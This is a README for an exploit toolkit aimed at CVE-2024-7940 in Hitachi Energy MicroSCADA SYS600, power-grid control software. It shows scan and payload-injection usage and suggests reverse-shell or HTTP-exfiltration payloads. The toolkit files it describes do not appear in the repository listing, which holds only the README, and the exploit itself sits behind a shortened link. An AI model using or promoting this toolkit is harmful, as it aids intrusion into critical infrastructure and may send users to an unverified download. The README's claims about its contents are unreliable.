# CVE-2024-7940 Exploit Toolkit
🌍 Overview
This repository provides a toolkit to validate and exploit the CVE-2024-7940 vulnerability in Hitachi Energy's MicroSCADA X SYS600 and MicroSCADA SYS600 products. The vulnerability exposes a local-only service to all network interfaces without authentication, posing a critical risk due to potential unauthorized access.
⚙️ Features
- ✅ Automatic detection of exposed MicroSCADA services
- ✅ Validates unauthenticated access to the service
- ✅ Supports proxy integration for traffic inspection (e.g., Burp/ZAP)
- ✅ Handles single or multiple target scanning
- ✅ Allows custom payload injection for service interaction
🧪 Affected Products
| Product | Affected Versions |
|---------|-------------------|
| Hitachi Energy MicroSCADA X SYS600 | All versions |
⚡ Vulnerability Summary
| Field | Value |
|-------|-------|
| Component | Hitachi Energy MicroSCADA X SYS600, MicroSCADA SYS600 |
| Issue | Unauthenticated Service Exposure on All Network Interfaces |
| CVE | CVE-2024-7940 |
| CVSSv3 | 9.8 |
🧰 Toolkit Components
- ✅ **exploit.py**: A Python script to scan and interact with the exposed MicroSCADA service.
- Detects open services
- Validates unauthenticated access
- Sends custom payloads
- ✅ **example-payload.txt**: Sample payload for service interaction.
🚀 Usage
🔸 Basic Usage
```bash
python3 exploit.py -u target:port
```
🔸 Multiple Targets
```bash
python3 exploit.py -f targets.txt --proxy 127.0.0.1:8080:user:pass
```
🔸 All Arguments
| Argument | Description |
|----------|-------------|
| `-u` | Target URL (e.g., target:port) |
| `-f` | File containing target URLs (one per line) |
| `-p` | Payload file for service interaction (e.g., payloads/example-payload.txt) |
| `--proxy` | Optional proxy (e.g., 127.0.0.1:8080:user:pass) |
| `-t` | Timeout in seconds (default: 15) |
🔧 Requirements
- Python 3.10
- Install dependencies:
```bash
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
- Network scanning tool (e.g., Nmap) for manual validation
About Payload Structure and Generating Payloads - Exploit Instrucion.md
## Exploit [href](https://tinyurl.com/2cu5csbx)
📡 Notes
- This vulnerability does not return direct command output. Use payloads that trigger observable actions (e.g., reverse shell or HTTP exfiltration).
- Mitigation: Restrict network access to the service and apply vendor patches.
# ⚠️ Legal Disclaimer
This toolkit is provided for educational and authorized security testing only. Do not use against systems without explicit permission. Misuse may be illegal and unethical.
[4.0K] /data/pocs/c5a89c0246e13bb6f95116db62aeaaeefa1fa4b0
└── [2.6K] README.md
0 directories, 1 file